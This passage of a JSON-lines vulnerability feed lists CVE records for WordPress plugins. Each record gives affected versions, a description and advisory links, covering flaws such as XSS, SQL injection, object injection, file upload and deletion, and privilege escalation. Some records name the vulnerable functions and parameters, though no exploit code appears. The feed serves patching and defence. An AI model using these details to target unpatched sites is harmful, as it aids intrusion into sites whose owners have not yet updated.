version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212527%40wplegalpages&new=3212527%40wplegalpages&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212527%40wplegalpages&new=3212527%40wplegalpages&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da64b2f-8546-4276-9dbf-b60e885a0309?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8da64b2f-8546-4276-9dbf-b60e885a0309?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4678","slug":"templatesnext-toolkit","versionEndExcluding":"3.2.8","description":"The TemplatesNext ToolKit WordPress plugin before 3.2.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a36d665-a0ca-4346-8e55-cf9ba45966cc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a36d665-a0ca-4346-8e55-cf9ba45966cc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1312","slug":"ultimate-blocks","versionImpact":"3.2.7","versionEndExcluding":"3.2.8","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'buttonTextColor' parameter in all versions up to, and including, 3.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/call-to-action\\\/block.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/call-to-action\\\/block.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac422162-be05-4420-9877-d6d41b83e881?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac422162-be05-4420-9877-d6d41b83e881?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5943","slug":"wp-nested-pages","versionImpact":"3.2.7","versionEndExcluding":"3.2.8","description":"The Nested Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.7. This is due to missing or incorrect nonce validation on the 'settingsPage' function and missing sanitization of the 'tab' parameter. This makes it possible for unauthenticated attackers to call local php files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2663150-61f9-49e3-9219-fbe89cc6b03c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2663150-61f9-49e3-9219-fbe89cc6b03c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Config\\\/Settings.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Config\\\/Settings.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Views\\\/settings\\\/settings.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/trunk\\\/app\\\/Views\\\/settings\\\/settings.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111847\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111847\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2305","slug":"download-manager","versionEndExcluding":"3.2.71","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpdm_members', 'wpdm_login_form', 'wpdm_reg_form' shortcodes in versions up to, and including, 3.2.70 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2906403%40download-manager&new=2906403%40download-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2906403%40download-manager&new=2906403%40download-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/members.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/members.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a66bc196-e5f8-46b4-a81c-c888eb64021c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a66bc196-e5f8-46b4-a81c-c888eb64021c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/login-form.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/login-form.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/reg-form.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.2.70\\\/src\\\/User\\\/views\\\/reg-form.php#L11\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1524","slug":"download-manager","versionEndExcluding":"3.2.71","description":"The Download Manager WordPress plugin before 3.2.71 does not adequately validate passwords for password-protected files. Upon validation, a master key is generated and exposed to the user, which may be used to download any password-protected file on the server, allowing a user to download any file with the knowledge of any one file's password.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3802d15d-9bfd-4762-ab8a-04475451868e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3802d15d-9bfd-4762-ab8a-04475451868e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9883","slug":"pods","versionImpact":"3.2.7","versionEndExcluding":"3.2.7.1","description":"The Pods  WordPress plugin before 3.2.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea4b277e-ef47-4e38-bd82-c5a54a95372f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea4b277e-ef47-4e38-bd82-c5a54a95372f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6222","slug":"woocommerce-refund-and-exchange","versionImpact":"3.2.6","versionEndExcluding":"3.2.7","description":"The WooCommerce Refund And Exchange with RMA - Warranty Management, Refund Policy, Manage User Wallet theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'ced_rnx_order_exchange_attach_files' function in all versions up to, and including, 3.2.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-refund-and-exchange\\\/17810207#item-description__changelog\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-refund-and-exchange\\\/17810207#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a7b5a1-b052-4390-8e08-f97aa9c16b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a7b5a1-b052-4390-8e08-f97aa9c16b29?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3392","slug":"expand-maker","versionImpact":"3.2.6.1","versionEndExcluding":"3.2.7","description":"The Read More & Accordion WordPress plugin before 3.2.7 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e733ccf-8026-4831-9863-e505c2aecba6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e733ccf-8026-4831-9863-e505c2aecba6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12171","slug":"elex-helpdesk-customer-support-ticket-system","versionImpact":"3.2.6","versionEndExcluding":"3.2.7","description":"The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the 'eh_crm_agent_add_user' AJAX action in all versions up to, and including, 3.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new administrative user accounts.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227859\\\/elex-helpdesk-customer-support-ticket-system\\\/trunk\\\/includes\\\/class-crm-ajax-functions-one.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227859\\\/elex-helpdesk-customer-support-ticket-system\\\/trunk\\\/includes\\\/class-crm-ajax-functions-one.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213791%40elex-helpdesk-customer-support-ticket-system&new=3213791%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213791%40elex-helpdesk-customer-support-ticket-system&new=3213791%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbcd978b-e81f-4c39-b2f7-adc948d21b1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbcd978b-e81f-4c39-b2f7-adc948d21b1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0659","slug":"easy-digital-downloads","versionImpact":"3.2.6","versionEndExcluding":"3.2.7","description":"The Easy Digital Downloads \u2013 Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manager-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.6&old=3030600&new_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.7&new=3030600&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.6&old=3030600&new_path=\\\/easy-digital-downloads\\\/tags\\\/3.2.7&new=3030600&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13446","slug":"workreap","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The Workreap plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.2.5. This is due to the plugin not properly validating a user's identity prior to (1) performing a social auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account. NOTE: This vulnerability was partially fixed in version 3.2.5.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1512","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the \/lms\/stm-lms\/order\/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036794\\\/masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/classes\\\/models\\\/StmStatistics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036794\\\/masterstudy-lms-learning-management-system\\\/trunk\\\/_core\\\/lms\\\/classes\\\/models\\\/StmStatistics.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8213","slug":"ninjascanner","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The NinjaScanner \u2013 Virus & Malware scan plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'nscan_ajax_quarantine' and 'nscan_quarantine_select' functions in all versions up to, and including, 3.2.5. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, including files outside the WordPress root directory.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/ajax_hooks.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/ajax_hooks.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/tab_quarantine.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjascanner\\\/trunk\\\/lib\\\/tab_quarantine.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336569\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336569\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b1da345-ddbb-48ad-b0c1-bb0cb3b0fc69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b1da345-ddbb-48ad-b0c1-bb0cb3b0fc69?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8871","slug":"easy-pricing-tables","versionImpact":"3.2.5","versionEndExcluding":"3.2.6","description":"The Pricing Tables WordPress Plugin \u2013 Easy Pricing Tables plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e4f40b-c028-4283-ba02-c77408136713?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5e4f40b-c028-4283-ba02-c77408136713?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/notices\\\/notices.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/notices\\\/notices.php#L91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10637","slug":"kadence-blocks","versionImpact":"3.2.53","versionEndExcluding":"3.2.54","description":"The Gutenberg Blocks with AI by Kadence WP  WordPress plugin before 3.2.54 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.54, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12581","slug":"kadence-blocks","versionImpact":"3.2.53","versionEndExcluding":"3.2.54","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.2.54, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-10637\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-10637\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df688dcc-9617-4f58-a310-891bfaea3695\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f3eaf-44a7-4e32-a620-8799eb74742a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406f3eaf-44a7-4e32-a620-8799eb74742a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4939","slug":"salesmanago","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The SALESmanago plugin for WordPress is vulnerable to Log Injection in versions up to, and including, 3.2.4. This is due to the use of a weak authentication token for the \/wp-json\/salesmanago\/v1\/callbackApiV3 API endpoint which is simply a SHA1 hash of the site URL and client ID found in the page source of the website. This makes it possible for unauthenticated attackers to inject arbitrary content into the log files, and when combined with another vulnerability this could have significant consequences.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Includes\\\/Helper.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Includes\\\/Helper.php#L376\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Admin\\\/Controller\\\/CallbackController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salesmanago\\\/trunk\\\/src\\\/Admin\\\/Controller\\\/CallbackController.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7db1d6-b352-44c7-a6cc-b21cb65a0482?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7db1d6-b352-44c7-a6cc-b21cb65a0482?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8289","slug":"wpcf7-redirect","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Redirection for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.4 via deserialization of untrusted input in the delete_associated_files function. This makes it possible for unauthenticated attackers to inject a PHP Object. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with a file upload action, and doesn't affect sites with PHP version > 8. This vulnerability also requires the 'Redirection For Contact Form 7 Extension - Create Post' extension to be installed and activated in order to be exploited. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. We confirmed there is a usable gadget in Contact Form 7 plugin that makes arbitrary file deletion possible when installed with this plugin. Given Contact Form 7 is a requirement of this plugin, it is likely that any site with this plugin and the 'Redirection For Contact Form 7 Extension - Create Post' extension enabled is vulnerable to arbitrary file deletion.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.4\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.4\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7909b75-8087-4d38-8325-c619bf84d997?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7909b75-8087-4d38-8325-c619bf84d997?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8145","slug":"wpcf7-redirect","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Redirection for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.4 via deserialization of untrusted input in the get_lead_fields function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in a Contact Form 7 plugin allows attackers to delete arbitrary files. Additionally, in certain server configurations, Remote Code Execution is possible","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-lead.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-lead.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb275d5-ec4b-419f-84e1-84172d381411?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cb275d5-ec4b-419f-84e1-84172d381411?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41804","slug":"astra-pro-sites","versionEndExcluding":"3.2.5","description":"Server-Side Request Forgery (SSRF) vulnerability in Brainstorm Force Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates. This issue affects Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates: from n\/a through 3.2.4.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/astra-sites\\\/wordpress-starter-templates-plugin-3-2-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/astra-sites\\\/wordpress-starter-templates-plugin-3-2-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8141","slug":"wpcf7-redirect","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Redirection for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_associated_files function in all versions up to, and including, 3.2.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcf7-redirect\\\/tags\\\/3.2.3\\\/classes\\\/class-wpcf7r-save-files.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafd0159-25ab-430d-88ef-c4d09d23baa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafd0159-25ab-430d-88ef-c4d09d23baa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
